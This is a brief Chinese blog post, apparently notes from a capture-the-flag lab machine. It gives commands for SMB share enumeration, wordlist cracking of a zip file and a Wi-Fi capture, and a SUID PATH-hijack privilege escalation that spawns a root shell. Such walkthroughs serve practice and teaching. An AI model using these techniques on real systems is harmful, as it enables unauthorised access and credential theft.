发布时间: 2020-3-10 文章作者: myluzh 分类名称: SECURE 朗读文章
smbclient//ip/myshare -U xxxx查看了下当前目录文件,main.txt跟safe.zip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safezip
aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt
uname -a Linux nitin 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:01:15 UTC 2019 i686 i686 i686 GNU/Linux后面没思路了,查看了writeup,如下,等有空再研究
find / -perm -u=s -type f 2>/dev/null
cd /tmp echo "/bin/sh" > netstat chmod 777 netstat echo $PATH export PATH=/tmp:$PATH cd /usr/bin ./netscan whoami
发表评论